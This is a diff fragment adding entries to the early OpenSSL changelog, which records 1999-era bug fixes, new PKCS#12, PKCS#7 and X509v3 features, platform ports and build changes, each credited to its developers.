+     wrong with it but it was very old and did things like calling
+     PEM_ASN1_read() directly and used MD5 for the hash not to mention some
+     unusual formatting.
+     [Steve Henson]
+
+  *) Fix demos/selfsign.c: it used obsolete and deleted functions, changed
+     to use the new extension code.
+     [Steve Henson]
+
+  *) Implement the PEM_read/PEM_write functions in crypto/pem/pem_all.c
+     with macros. This should make it easier to change their form, add extra
+     arguments etc. Fix a few PEM prototypes which didn't have cipher as a
+     constant.
+     [Steve Henson]
+
+  *) Add to configuration table a new entry that can specify an alternative
+     name for unistd.h (for pre-POSIX systems); we need this for NeXTstep,
+     according to Mark Crispin <MRC@Panda.COM>.
+     [Bodo Moeller]
+
+#if 0
+  *) DES CBC did not update the IV. Weird.
+     [Ben Laurie]
+#else
+     des_cbc_encrypt does not update the IV, but des_ncbc_encrypt does.
+     Changing the behaviour of the former might break existing programs --
+     where IV updating is needed, des_ncbc_encrypt can be used.
+#endif
+
+  *) When bntest is run from "make test" it drives bc to check its
+     calculations, as well as internally checking them. If an internal check
+     fails, it needs to cause bc to give a non-zero result or make test carries
+     on without noticing the failure. Fixed.
+     [Ben Laurie]
+
+  *) DES library cleanups.
+     [Ulf Möller]
+
+  *) Add support for PKCS#5 v2.0 PBE algorithms. This will permit PKCS#8 to be
+     used with any cipher unlike PKCS#5 v1.5 which can at most handle 64 bit
+     ciphers. NOTE: although the key derivation function has been verified
+     against some published test vectors it has not been extensively tested
+     yet. Added a -v2 "cipher" option to pkcs8 application to allow the use
+     of v2.0.
+     [Steve Henson]
+
+  *) Instead of "mkdir -p", which is not fully portable, use new
+     Perl script "util/mkdir-p.pl".
+     [Bodo Moeller]
+
+  *) Rewrite the way password based encryption (PBE) is handled. It used to
+     assume that the ASN1 AlgorithmIdentifier parameter was a PBEParameter
+     structure. This was true for the PKCS#5 v1.5 and PKCS#12 PBE algorithms
+     but doesn't apply to PKCS#5 v2.0 where it can be something else. Now
+     the 'parameter' field of the AlgorithmIdentifier is passed to the
+     underlying key generation function so it must do its own ASN1 parsing.
+     This has also changed the EVP_PBE_CipherInit() function which now has a
+     'parameter' argument instead of literal salt and iteration count values
+     and the function EVP_PBE_ALGOR_CipherInit() has been deleted.
+     [Steve Henson]
+
+  *) Support for PKCS#5 v1.5 compatible password based encryption algorithms
+     and PKCS#8 functionality. New 'pkcs8' application linked to openssl.
+     Needed to change the PEM_STRING_EVP_PKEY value which was just "PRIVATE
+     KEY" because this clashed with PKCS#8 unencrypted string. Since this
+     value was just used as a "magic string" and not used directly its
+     value doesn't matter.
+     [Steve Henson]
+
+  *) Introduce some semblance of const correctness to BN. Shame C doesn't
+     support mutable.
+     [Ben Laurie]
+
+  *) "linux-sparc64" configuration (ultrapenguin).
+     [Ray Miller <ray.miller@oucs.ox.ac.uk>]
+     "linux-sparc" configuration.
+     [Christian Forster <fo@hawo.stw.uni-erlangen.de>]
+
+  *) config now generates no-xxx options for missing ciphers.
+     [Ulf Möller]
+
+  *) Support the EBCDIC character set (work in progress).
+     File ebcdic.c not yet included because it has a different license.
+     [Martin Kraemer <Martin.Kraemer@MchP.Siemens.De>]
+
+  *) Support BS2000/OSD-POSIX.
+     [Martin Kraemer <Martin.Kraemer@MchP.Siemens.De>]
+
+  *) Make callbacks for key generation use void * instead of char *.
+     [Ben Laurie]
+
+  *) Make S/MIME samples compile (not yet tested).
+     [Ben Laurie]
+
+  *) Additional typesafe stacks.
+     [Ben Laurie]
+
+  *) New configuration variants "bsdi-elf-gcc" (BSD/OS 4.x).
+     [Bodo Moeller]
+
+
+ Changes between 0.9.3 and 0.9.3a  [29 May 1999]
+
+  *) New configuration variant "sco5-gcc".
+
+  *) Updated some demos.
+     [Sean O Riordain, Wade Scholine]
+
+  *) Add missing BIO_free at exit of pkcs12 application.
+     [Wu Zhigang]
+
+  *) Fix memory leak in conf.c.
+     [Steve Henson]
+
+  *) Updates for Win32 to assembler version of MD5.
+     [Steve Henson]
+
+  *) Set #! path to perl in apps/der_chop to where we found it
+     instead of using a fixed path.
+     [Bodo Moeller]
+
+  *) SHA library changes for irix64-mips4-cc.
+     [Andy Polyakov]
+
+  *) Improvements for VMS support.
+     [Richard Levitte]
+
+
+ Changes between 0.9.2b and 0.9.3  [24 May 1999]
+
+  *) Bignum library bug fix. IRIX 6 passes "make test" now!
+     This also avoids the problems with SC4.2 and unpatched SC5.  
+     [Andy Polyakov <appro@fy.chalmers.se>]
+
+  *) New functions sk_num, sk_value and sk_set to replace the previous macros.
+     These are required because of the typesafe stack would otherwise break 
+     existing code. If old code used a structure member which used to be STACK
+     and is now STACK_OF (for example cert in a PKCS7_SIGNED structure) with
+     sk_num or sk_value it would produce an error because the num, data members
+     are not present in STACK_OF. Now it just produces a warning. sk_set
+     replaces the old method of assigning a value to sk_value
+     (e.g. sk_value(x, i) = y) which the library used in a few cases. Any code
+     that does this will no longer work (and should use sk_set instead) but
+     this could be regarded as a "questionable" behaviour anyway.
+     [Steve Henson]
+
+  *) Fix most of the other PKCS#7 bugs. The "experimental" code can now
+     correctly handle encrypted S/MIME data.
+     [Steve Henson]
+
+  *) Change type of various DES function arguments from des_cblock
+     (which means, in function argument declarations, pointer to char)
+     to des_cblock * (meaning pointer to array with 8 char elements),
+     which allows the compiler to do more typechecking; it was like
+     that back in SSLeay, but with lots of ugly casts.
+
+     Introduce new type const_des_cblock.
+     [Bodo Moeller]
+
+  *) Reorganise the PKCS#7 library and get rid of some of the more obvious
+     problems: find RecipientInfo structure that matches recipient certificate
+     and initialise the ASN1 structures properly based on passed cipher.
+     [Steve Henson]
+
+  *) Belatedly make the BN tests actually check the results.
+     [Ben Laurie]
+
+  *) Fix the encoding and decoding of negative ASN1 INTEGERS and conversion
+     to and from BNs: it was completely broken. New compilation option
+     NEG_PUBKEY_BUG to allow for some broken certificates that encode public
+     key elements as negative integers.
+     [Steve Henson]
+
+  *) Reorganize and speed up MD5.
+     [Andy Polyakov <appro@fy.chalmers.se>]
+
+  *) VMS support.
+     [Richard Levitte <richard@levitte.org>]
+
+  *) New option -out to asn1parse to allow the parsed structure to be
+     output to a file. This is most useful when combined with the -strparse
+     option to examine the output of things like OCTET STRINGS.
+     [Steve Henson]
+
+  *) Make SSL library a little more fool-proof by not requiring any longer
+     that SSL_set_{accept,connect}_state be called before
+     SSL_{accept,connect} may be used (SSL_set_..._state is omitted
+     in many applications because usually everything *appeared* to work as
+     intended anyway -- now it really works as intended).
+     [Bodo Moeller]
+
+  *) Move openssl.cnf out of lib/.
+     [Ulf Möller]
+
+  *) Fix various things to let OpenSSL even pass ``egcc -pipe -O2 -Wall
+     -Wshadow -Wpointer-arith -Wcast-align -Wmissing-prototypes
+     -Wmissing-declarations -Wnested-externs -Winline'' with EGCS 1.1.2+ 
+     [Ralf S. Engelschall]
+
+  *) Various fixes to the EVP and PKCS#7 code. It may now be able to
+     handle PKCS#7 enveloped data properly.
+     [Sebastian Akerman <sak@parallelconsulting.com>, modified by Steve]
+
+  *) Create a duplicate of the SSL_CTX's CERT in SSL_new instead of
+     copying pointers.  The cert_st handling is changed by this in
+     various ways (and thus what used to be known as ctx->default_cert
+     is now called ctx->cert, since we don't resort to s->ctx->[default_]cert
+     any longer when s->cert does not give us what we need).
+     ssl_cert_instantiate becomes obsolete by this change.
+     As soon as we've got the new code right (possibly it already is?),
+     we have solved a couple of bugs of the earlier code where s->cert
+     was used as if it could not have been shared with other SSL structures.
+
+     Note that using the SSL API in certain dirty ways now will result
+     in different behaviour than observed with earlier library versions:
+     Changing settings for an SSL_CTX *ctx after having done s = SSL_new(ctx)
+     does not influence s as it used to.
+     
+     In order to clean up things more thoroughly, inside SSL_SESSION
+     we don't use CERT any longer, but a new structure SESS_CERT
+     that holds per-session data (if available); currently, this is
+     the peer's certificate chain and, for clients, the server's certificate
+     and temporary key.  CERT holds only those values that can have
+     meaningful defaults in an SSL_CTX.
+     [Bodo Moeller]
+
+  *) New function X509V3_EXT_i2d() to create an X509_EXTENSION structure
+     from the internal representation. Various PKCS#7 fixes: remove some
+     evil casts and set the enc_dig_alg field properly based on the signing
+     key type.
+     [Steve Henson]
+
+  *) Allow PKCS#12 password to be set from the command line or the
+     environment. Let 'ca' get its config file name from the environment
+     variables "OPENSSL_CONF" or "SSLEAY_CONF" (for consistency with 'req'
+     and 'x509').
+     [Steve Henson]
+
+  *) Allow certificate policies extension to use an IA5STRING for the
+     organization field. This is contrary to the PKIX definition but
+     VeriSign uses it and IE5 only recognises this form. Document 'x509'
+     extension option.
+     [Steve Henson]
+
+  *) Add PEDANTIC compiler flag to allow compilation with gcc -pedantic,
+     without disallowing inline assembler and the like for non-pedantic builds.
+     [Ben Laurie]
+
+  *) Support Borland C++ builder.
+     [Janez Jere <jj@void.si>, modified by Ulf Möller]
+
+  *) Support Mingw32.
+     [Ulf Möller]
+
+  *) SHA-1 cleanups and performance enhancements.
+     [Andy Polyakov <appro@fy.chalmers.se>]
+
+  *) Sparc v8plus assembler for the bignum library.
+     [Andy Polyakov <appro@fy.chalmers.se>]
+
+  *) Accept any -xxx and +xxx compiler options in Configure.
+     [Ulf Möller]
+
+  *) Update HPUX configuration.
+     [Anonymous]
+  
+  *) Add missing sk_<type>_unshift() function to safestack.h
+     [Ralf S. Engelschall]
+
+  *) New function SSL_CTX_use_certificate_chain_file that sets the
+     "extra_cert"s in addition to the certificate.  (This makes sense
+     only for "PEM" format files, as chains as a whole are not
+     DER-encoded.)
+     [Bodo Moeller]
+
+  *) Support verify_depth from the SSL API.
+     x509_vfy.c had what can be considered an off-by-one-error:
+     Its depth (which was not part of the external interface)
+     was actually counting the number of certificates in a chain;
+     now it really counts the depth.
+     [Bodo Moeller]
+
+  *) Bugfix in crypto/x509/x509_cmp.c: The SSLerr macro was used
+     instead of X509err, which often resulted in confusing error
+     messages since the error codes are not globally unique
+     (e.g. an alleged error in ssl3_accept when a certificate
+     didn't match the private key).
+
+  *) New function SSL_CTX_set_session_id_context that allows to set a default
+     value (so that you don't need SSL_set_session_id_context for each
+     connection using the SSL_CTX).
+     [Bodo Moeller]
+
+  *) OAEP decoding bug fix.
+     [Ulf Möller]
+
+  *) Support INSTALL_PREFIX for package builders, as proposed by
+     David Harris.
+     [Bodo Moeller]
+
+  *) New Configure options "threads" and "no-threads".  For systems
+     where the proper compiler options are known (currently Solaris
+     and Linux), "threads" is the default.
+     [Bodo Moeller]
+
+  *) New script util/mklink.pl as a faster substitute for util/mklink.sh.
+     [Bodo Moeller]
+
+  *) Install various scripts to $(OPENSSLDIR)/misc, not to
+     $(INSTALLTOP)/bin -- they shouldn't clutter directories
+     such as /usr/local/bin.
+     [Bodo Moeller]
+
+  *) "make linux-shared" to build shared libraries.
+     [Niels Poppe <niels@netbox.org>]
+
+  *) New Configure option no-<cipher> (rsa, idea, rc5, ...).
+     [Ulf Möller]
+
+  *) Add the PKCS#12 API documentation to openssl.txt. Preliminary support for
+     extension adding in x509 utility.
+     [Steve Henson]
+
+  *) Remove NOPROTO sections and error code comments.
+     [Ulf Möller]
+
+  *) Partial rewrite of the DEF file generator to now parse the ANSI
+     prototypes.
+     [Steve Henson]
+
+  *) New Configure options --prefix=DIR and --openssldir=DIR.
+     [Ulf Möller]
+
+  *) Complete rewrite of the error code script(s). It is all now handled
+     by one script at the top level which handles error code gathering,
+     header rewriting and C source file generation. It should be much better
+     than the old method: it now uses a modified version of Ulf's parser to
+     read the ANSI prototypes in all header files (thus the old K&R definitions
+     aren't needed for error creation any more) and do a better job of
+     translating function codes into names. The old 'ASN1 error code imbedded
+     in a comment' is no longer necessary and it doesn't use .err files which
+     have now been deleted. Also the error code call doesn't have to appear all
+     on one line (which resulted in some large lines...).
+     [Steve Henson]
+
+  *) Change #include filenames from <foo.h> to <openssl/foo.h>.
+     [Bodo Moeller]
+
+  *) Change behaviour of ssl2_read when facing length-0 packets: Don't return
+     0 (which usually indicates a closed connection), but continue reading.
+     [Bodo Moeller]
+
+  *) Fix some race conditions.
+     [Bodo Moeller]
+
+  *) Add support for CRL distribution points extension. Add Certificate
+     Policies and CRL distribution points documentation.
+     [Steve Henson]
+
+  *) Move the autogenerated header file parts to crypto/opensslconf.h.
+     [Ulf Möller]
+
+  *) Fix new 56-bit DES export ciphersuites: they were using 7 bytes instead of
+     8 of keying material. Merlin has also confirmed interop with this fix
+     between OpenSSL and Baltimore C/SSL 2.0 and J/SSL 2.0.
+     [Merlin Hughes <merlin@baltimore.ie>]
+
+  *) Fix lots of warnings.
+     [Richard Levitte <levitte@stacken.kth.se>]
+ 
+  *) In add_cert_dir() in crypto/x509/by_dir.c, break out of the loop if
+     the directory spec didn't end with a LIST_SEPARATOR_CHAR.
+     [Richard Levitte <levitte@stacken.kth.se>]
+ 
+  *) Fix problems with sizeof(long) == 8.
+     [Andy Polyakov <appro@fy.chalmers.se>]
+
+  *) Change functions to ANSI C.
+     [Ulf Möller]
+
+  *) Fix typos in error codes.
+     [Martin Kraemer <Martin.Kraemer@MchP.Siemens.De>, Ulf Möller]
+
+  *) Remove defunct assembler files from Configure.
+     [Ulf Möller]
+
+  *) SPARC v8 assembler BIGNUM implementation.
+     [Andy Polyakov <appro@fy.chalmers.se>]
+
+  *) Support for Certificate Policies extension: both print and set.
+     Various additions to support the r2i method this uses.
+     [Steve Henson]
+
+  *) A lot of constification, and fix a bug in X509_NAME_oneline() that could
+     return a const string when you are expecting an allocated buffer.
+     [Ben Laurie]
+
+  *) Add support for ASN1 types UTF8String and VISIBLESTRING, also the CHOICE
+     types DirectoryString and DisplayText.
+     [Steve Henson]
+
+  *) Add code to allow r2i extensions to access the configuration database,
+     add an LHASH database driver and add several ctx helper functions.
+     [Steve Henson]
+
+  *) Fix an evil bug in bn_expand2() which caused various BN functions to
+     fail when they extended the size of a BIGNUM.
+     [Steve Henson]
+
+  *) Various utility functions to handle SXNet extension. Modify mkdef.pl to
+     support typesafe stack.
+     [Steve Henson]
+
+  *) Fix typo in SSL_[gs]et_options().
+     [Nils Frostberg <nils@medcom.se>]
+
+  *) Delete various functions and files that belonged to the (now obsolete)
+     old X509V3 handling code.
+     [Steve Henson]
+
+  *) New Configure option "rsaref".
+     [Ulf Möller]
+
+  *) Don't auto-generate pem.h.
+     [Bodo Moeller]
+
+  *) Introduce type-safe ASN.1 SETs.
+     [Ben Laurie]
+
+  *) Convert various additional casted stacks to type-safe STACK_OF() variants.
+     [Ben Laurie, Ralf S. Engelschall, Steve Henson]
+
+  *) Introduce type-safe STACKs. This will almost certainly break lots of code
+     that links with OpenSSL (well at least cause lots of warnings), but fear
+     not: the conversion is trivial, and it eliminates loads of evil casts. A
+     few STACKed things have been converted already. Feel free to convert more.
+     In the fullness of time, I'll do away with the STACK type altogether.
+     [Ben Laurie]
+
+  *) Add `openssl ca -revoke <certfile>' facility which revokes a certificate
+     specified in <certfile> by updating the entry in the index.txt file.
+     This way one no longer has to edit the index.txt file manually for
+     revoking a certificate. The -revoke option does the gory details now.
+     [Massimiliano Pala <madwolf@openca.org>, Ralf S. Engelschall]
+
+  *) Fix `openssl crl -noout -text' combination where `-noout' killed the
+     `-text' option at all and this way the `-noout -text' combination was
+     inconsistent in `openssl crl' with the friends in `openssl x509|rsa|dsa'.
+     [Ralf S. Engelschall]
+
+  *) Make sure a corresponding plain text error message exists for the
+     X509_V_ERR_CERT_REVOKED/23 error number which can occur when a
+     verify callback function determined that a certificate was revoked.
+     [Ralf S. Engelschall]
+
+  *) Bugfix: In test/testenc, don't test "openssl <cipher>" for
+     ciphers that were excluded, e.g. by -DNO_IDEA.  Also, test
+     all available cipers including rc5, which was forgotten until now.
+     In order to let the testing shell script know which algorithms
+     are available, a new (up to now undocumented) command
+     "openssl list-cipher-commands" is used.
+     [Bodo Moeller]
+
+  *) Bugfix: s_client occasionally would sleep in select() when
+     it should have checked SSL_pending() first.
+     [Bodo Moeller]
+
+  *) New functions DSA_do_sign and DSA_do_verify to provide access to
+     the raw DSA values prior to ASN.1 encoding.
+     [Ulf Möller]
+
+  *) Tweaks to Configure
+     [Niels Poppe <niels@netbox.org>]
+
+  *) Add support for PKCS#5 v2.0 ASN1 PBES2 structures. No other support,
+     yet...
+     [Steve Henson]
+
+  *) New variables $(RANLIB) and $(PERL) in the Makefiles.
+     [Ulf Möller]
+
+  *) New config option to avoid instructions that are illegal on the 80386.
+     The default code is faster, but requires at least a 486.
+     [Ulf Möller]
+  
+  *) Got rid of old SSL2_CLIENT_VERSION (inconsistently used) and
+     SSL2_SERVER_VERSION (not used at all) macros, which are now the
+     same as SSL2_VERSION anyway.
+     [Bodo Moeller]
+
+  *) New "-showcerts" option for s_client.
+     [Bodo Moeller]
+
+  *) Still more PKCS#12 integration. Add pkcs12 application to openssl
+     application. Various cleanups and fixes.
+     [Steve Henson]
+
+  *) More PKCS#12 integration. Add new pkcs12 directory with Makefile.ssl and
+     modify error routines to work internally. Add error codes and PBE init
+     to library startup routines.
+     [Steve Henson]
+
+  *) Further PKCS#12 integration. Added password based encryption, PKCS#8 and
+     packing functions to asn1 and evp. Changed function names and error
+     codes along the way.
+     [Steve Henson]
+
+  *) PKCS12 integration: and so it begins... First of several patches to
+     slowly integrate PKCS#12 functionality into OpenSSL. Add PKCS#12
+     objects to objects.h
+     [Steve Henson]
+
+  *) Add a new 'indent' option to some X509V3 extension code. Initial ASN1
+     and display support for Thawte strong extranet extension.
+     [Steve Henson]
+
+  *) Add LinuxPPC support.
+     [Jeff Dubrule <igor@pobox.org>]
+
+  *) Get rid of redundant BN file bn_mulw.c, and rename bn_div64 to
+     bn_div_words in alpha.s.
+     [Hannes Reinecke <H.Reinecke@hw.ac.uk> and Ben Laurie]
+
+  *) Make sure the RSA OAEP test is skipped under -DRSAref because
+     OAEP isn't supported when OpenSSL is built with RSAref.
+     [Ulf Moeller <ulf@fitug.de>]
+
+  *) Move definitions of IS_SET/IS_SEQUENCE inside crypto/asn1/asn1.h 
+     so they no longer are missing under -DNOPROTO. 
+     [Soren S. Jorvang <soren@t.dk>]
+
+
+ Changes between 0.9.1c and 0.9.2b  [22 Mar 1999]
+
+  *) Make SSL_get_peer_cert_chain() work in servers. Unfortunately, it still
+     doesn't work when the session is reused. Coming soon!
+     [Ben Laurie]
+
+  *) Fix a security hole, that allows sessions to be reused in the wrong
+     context thus bypassing client cert protection! All software that uses
+     client certs and session caches in multiple contexts NEEDS PATCHING to
+     allow session reuse! A fuller solution is in the works.
+     [Ben Laurie, problem pointed out by Holger Reif, Bodo Moeller (and ???)]
+
+  *) Some more source tree cleanups (removed obsolete files
+     crypto/bf/asm/bf586.pl, test/test.txt and crypto/sha/asm/f.s; changed
+     permission on "config" script to be executable) and a fix for the INSTALL
+     document.
+     [Ulf Moeller <ulf@fitug.de>]
+
+  *) Remove some legacy and erroneous uses of malloc, free instead of
+     Malloc, Free.
+     [Lennart Bang <lob@netstream.se>, with minor changes by Steve]
+
+  *) Make rsa_oaep_test return non-zero on error.
+     [Ulf Moeller <ulf@fitug.de>]
+
+  *) Add support for native Solaris shared libraries. Configure
+     solaris-sparc-sc4-pic, make, then run shlib/solaris-sc4.sh. It'd be nice
+     if someone would make that last step automatic.
+     [Matthias Loepfe <Matthias.Loepfe@AdNovum.CH>]
+
+  *) ctx_size was not built with the right compiler during "make links". Fixed.
+     [Ben Laurie]
+
+  *) Change the meaning of 'ALL' in the cipher list. It now means "everything
+     except NULL ciphers". This means the default cipher list will no longer
+     enable NULL ciphers. They need to be specifically enabled e.g. with
+     the string "DEFAULT:eNULL".
+     [Steve Henson]
+
+  *) Fix to RSA private encryption routines: if p < q then it would
+     occasionally produce an invalid result. This will only happen with
+     externally generated keys because OpenSSL (and SSLeay) ensure p > q.
+     [Steve Henson]
+
+  *) Be less restrictive and allow also `perl util/perlpath.pl
+     /path/to/bin/perl' in addition to `perl util/perlpath.pl /path/to/bin',
+     because this way one can also use an interpreter named `perl5' (which is
+     usually the name of Perl 5.xxx on platforms where an Perl 4.x is still
+     installed as `perl').
+     [Matthias Loepfe <Matthias.Loepfe@adnovum.ch>]
+
+  *) Let util/clean-depend.pl work also with older Perl 5.00x versions.
+     [Matthias Loepfe <Matthias.Loepfe@adnovum.ch>]
+
+  *) Fix Makefile.org so CC,CFLAG etc are passed to 'make links' add
+     advapi32.lib to Win32 build and change the pem test comparision
+     to fc.exe (thanks to Ulrich Kroener <kroneru@yahoo.com> for the
+     suggestion). Fix misplaced ASNI prototypes and declarations in evp.h
+     and crypto/des/ede_cbcm_enc.c.
+     [Steve Henson]
+
+  *) DES quad checksum was broken on big-endian architectures. Fixed.
+     [Ben Laurie]
+
+  *) Comment out two functions in bio.h that aren't implemented. Fix up the
+     Win32 test batch file so it (might) work again. The Win32 test batch file
+     is horrible: I feel ill....
+     [Steve Henson]
+
+  *) Move various #ifdefs around so NO_SYSLOG, NO_DIRENT etc are now selected
+     in e_os.h. Audit of header files to check ANSI and non ANSI
+     sections: 10 functions were absent from non ANSI section and not exported
+     from Windows DLLs. Fixed up libeay.num for new functions.
+     [Steve Henson]
+
+  *) Make `openssl version' output lines consistent.
+     [Ralf S. Engelschall]
+
+  *) Fix Win32 symbol export lists for BIO functions: Added
+     BIO_get_ex_new_index, BIO_get_ex_num, BIO_get_ex_data and BIO_set_ex_data
+     to ms/libeay{16,32}.def.
+     [Ralf S. Engelschall]
+
+  *) Second round of fixing the OpenSSL perl/ stuff. It now at least compiled
+     fine under Unix and passes some trivial tests I've now added. But the
+     whole stuff is horribly incomplete, so a README.1ST with a disclaimer was
+     added to make sure no one expects that this stuff really works in the
+     OpenSSL 0.9.2 release.  Additionally I've started to clean the XS sources
+     up and fixed a few little bugs and inconsistencies in OpenSSL.{pm,xs} and
+     openssl_bio.xs.
+     [Ralf S. Engelschall]
+
+  *) Fix the generation of two part addresses in perl.
+     [Kenji Miyake <kenji@miyake.org>, integrated by Ben Laurie]
+
+  *) Add config entry for Linux on MIPS.
+     [John Tobey <jtobey@channel1.com>]
+
+  *) Make links whenever Configure is run, unless we are on Windoze.
+     [Ben Laurie]
+
+  *) Permit extensions to be added to CRLs using crl_section in openssl.cnf.
+     Currently only issuerAltName and AuthorityKeyIdentifier make any sense
+     in CRLs.
+     [Steve Henson]
+
+  *) Add a useful kludge to allow package maintainers to specify compiler and
+     other platforms details on the command line without having to patch the
+     Configure script everytime: One now can use ``perl Configure
+     <id>:<details>'', i.e. platform ids are allowed to have details appended
+     to them (seperated by colons). This is treated as there would be a static
+     pre-configured entry in Configure's %table under key <id> with value
+     <details> and ``perl Configure <id>'' is called.  So, when you want to
+     perform a quick test-compile under FreeBSD 3.1 with pgcc and without
+     assembler stuff you can use ``perl Configure "FreeBSD-elf:pgcc:-O6:::"''
+     now, which overrides the FreeBSD-elf entry on-the-fly.
+     [Ralf S. Engelschall]
+
+  *) Disable new TLS1 ciphersuites by default: they aren't official yet.
+     [Ben Laurie]
+
+  *) Allow DSO flags like -fpic, -fPIC, -KPIC etc. to be specified
+     on the `perl Configure ...' command line. This way one can compile
+     OpenSSL libraries with Position Independent Code (PIC) which is needed
+     for linking it into DSOs.
+     [Ralf S. Engelschall]
+
+  *) Remarkably, export ciphers were totally broken and no-one had noticed!
+     Fixed.
+     [Ben Laurie]
+
+  *) Cleaned up the LICENSE document: The official contact for any license
+     questions now is the OpenSSL core team under openssl-core@openssl.org.
+     And add a paragraph about the dual-license situation to make sure people
+     recognize that _BOTH_ the OpenSSL license _AND_ the SSLeay license apply
+     to the OpenSSL toolkit.
+     [Ralf S. Engelschall]
+
+  *) General source tree makefile cleanups: Made `making xxx in yyy...'
+     display consistent in the source tree and replaced `/bin/rm' by `rm'.
+     Additonally cleaned up the `make links' target: Remove unnecessary
+     semicolons, subsequent redundant removes, inline point.sh into mklink.sh
+     to speed processing and no longer clutter the display with confusing
+     stuff. Instead only the actually done links are displayed.
+     [Ralf S. Engelschall]
+
+  *) Permit null encryption ciphersuites, used for authentication only. It used
+     to be necessary to set the preprocessor define SSL_ALLOW_ENULL to do this.
+     It is now necessary to set SSL_FORBID_ENULL to prevent the use of null
+     encryption.
+     [Ben Laurie]
+
+  *) Add a bunch of fixes to the PKCS#7 stuff. It used to sometimes reorder
+     signed attributes when verifying signatures (this would break them), 
+     the detached data encoding was wrong and public keys obtained using
+     X509_get_pubkey() weren't freed.
+     [Steve Henson]
+
+  *) Add text documentation for the BUFFER functions. Also added a work around
+     to a Win95 console bug. This was triggered by the password read stuff: the
+     last character typed gets carried over to the next fread(). If you were 
+     generating a new cert request using 'req' for example then the last
+     character of the passphrase would be CR which would then enter the first
+     field as blank.
+     [Steve Henson]
+
+  *) Added the new `Includes OpenSSL Cryptography Software' button as
+     doc/openssl_button.{gif,html} which is similar in style to the old SSLeay
+     button and can be used by applications based on OpenSSL to show the
+     relationship to the OpenSSL project.  
+     [Ralf S. Engelschall]
+
+  *) Remove confusing variables in function signatures in files
+     ssl/ssl_lib.c and ssl/ssl.h.
+     [Lennart Bong <lob@kulthea.stacken.kth.se>]
+
+  *) Don't install bss_file.c under PREFIX/include/
+     [Lennart Bong <lob@kulthea.stacken.kth.se>]
+
+  *) Get the Win32 compile working again. Modify mkdef.pl so it can handle
+     functions that return function pointers and has support for NT specific
+     stuff. Fix mk1mf.pl and VC-32.pl to support NT differences also. Various
+     #ifdef WIN32 and WINNTs sprinkled about the place and some changes from
+     unsigned to signed types: this was killing the Win32 compile.
+     [Steve Henson]
+
+  *) Add new certificate file to stack functions,
+     SSL_add_dir_cert_subjects_to_stack() and
+     SSL_add_file_cert_subjects_to_stack().  These largely supplant
+     SSL_load_client_CA_file(), and can be used to add multiple certs easily
+     to a stack (usually this is then handed to SSL_CTX_set_client_CA_list()).
+     This means that Apache-SSL and similar packages don't have to mess around
+     to add as many CAs as they want to the preferred list.
+     [Ben Laurie]
+
+  *) Experiment with doxygen documentation. Currently only partially applied to
+     ssl/ssl_lib.c.
+     See http://www.stack.nl/~dimitri/doxygen/index.html, and run doxygen with
+     openssl.doxy as the configuration file.
+     [Ben Laurie]
+  
+  *) Get rid of remaining C++-style comments which strict C compilers hate.
+     [Ralf S. Engelschall, pointed out by Carlos Amengual]
+
+  *) Changed BN_RECURSION in bn_mont.c to BN_RECURSION_MONT so it is not
+     compiled in by default: it has problems with large keys.
+     [Steve Henson]
+
+  *) Add a bunch of SSL_xxx() functions for configuring the temporary RSA and
+     DH private keys and/or callback functions which directly correspond to
+     their SSL_CTX_xxx() counterparts but work on a per-connection basis. This
+     is needed for applications which have to configure certificates on a
+     per-connection basis (e.g. Apache+mod_ssl) instead of a per-context basis
+     (e.g. s_server). 
+        For the RSA certificate situation is makes no difference, but
+     for the DSA certificate situation this fixes the "no shared cipher"
+     problem where the OpenSSL cipher selection procedure failed because the
+     temporary keys were not overtaken from the context and the API provided
+     no way to reconfigure them. 
+        The new functions now let applications reconfigure the stuff and they
+     are in detail: SSL_need_tmp_RSA, SSL_set_tmp_rsa, SSL_set_tmp_dh,
+     SSL_set_tmp_rsa_callback and SSL_set_tmp_dh_callback.  Additionally a new
+     non-public-API function ssl_cert_instantiate() is used as a helper
+     function and also to reduce code redundancy inside ssl_rsa.c.
+     [Ralf S. Engelschall]
+
+  *) Move s_server -dcert and -dkey options out of the undocumented feature
+     area because they are useful for the DSA situation and should be
+     recognized by the users.
+     [Ralf S. Engelschall]
+
+  *) Fix the cipher decision scheme for export ciphers: the export bits are
+     *not* within SSL_MKEY_MASK or SSL_AUTH_MASK, they are within
+     SSL_EXP_MASK.  So, the original variable has to be used instead of the
+     already masked variable.
+     [Richard Levitte <levitte@stacken.kth.se>]
+
+  *) Fix 'port' variable from `int' to `unsigned int' in crypto/bio/b_sock.c
+     [Richard Levitte <levitte@stacken.kth.se>]
+
+  *) Change type of another md_len variable in pk7_doit.c:PKCS7_dataFinal()
+     from `int' to `unsigned int' because it's a length and initialized by
+     EVP_DigestFinal() which expects an `unsigned int *'.
+     [Richard Levitte <levitte@stacken.kth.se>]
+
+  *) Don't hard-code path to Perl interpreter on shebang line of Configure
+     script. Instead use the usual Shell->Perl transition trick.
+     [Ralf S. Engelschall]
+
+  *) Make `openssl x509 -noout -modulus' functional also for DSA certificates
+     (in addition to RSA certificates) to match the behaviour of `openssl dsa
+     -noout -modulus' as it's already the case for `openssl rsa -noout
+     -modulus'.  For RSA the -modulus is the real "modulus" while for DSA
+     currently the public key is printed (a decision which was already done by
+     `openssl dsa -modulus' in the past) which serves a similar purpose.
+     Additionally the NO_RSA no longer completely removes the whole -modulus
+     option; it now only avoids using the RSA stuff. Same applies to NO_DSA
+     now, too.
+     [Ralf S.  Engelschall]
+
+  *) Add Arne Ansper's reliable BIO - this is an encrypted, block-digested
+     BIO. See the source (crypto/evp/bio_ok.c) for more info.
+     [Arne Ansper <arne@ats.cyber.ee>]
+
+  *) Dump the old yucky req code that tried (and failed) to allow raw OIDs
+     to be added. Now both 'req' and 'ca' can use new objects defined in the
+     config file.
+     [Steve Henson]
+
+  *) Add cool BIO that does syslog (or event log on NT).
+     [Arne Ansper <arne@ats.cyber.ee>, integrated by Ben Laurie]
+
+  *) Add support for new TLS ciphersuites, TLS_RSA_EXPORT56_WITH_RC4_56_MD5,
+     TLS_RSA_EXPORT56_WITH_RC2_CBC_56_MD5 and
+     TLS_RSA_EXPORT56_WITH_DES_CBC_SHA, as specified in "56-bit Export Cipher
+     Suites For TLS", draft-ietf-tls-56-bit-ciphersuites-00.txt.
+     [Ben Laurie]
+
+  *) Add preliminary config info for new extension code.
+     [Steve Henson]
+
+  *) Make RSA_NO_PADDING really use no padding.
+     [Ulf Moeller <ulf@fitug.de>]
+
+  *) Generate errors when private/public key check is done.
+     [Ben Laurie]
+
+  *) Overhaul for 'crl' utility. New function X509_CRL_print. Partial support
+     for some CRL extensions and new objects added.
+     [Steve Henson]
+
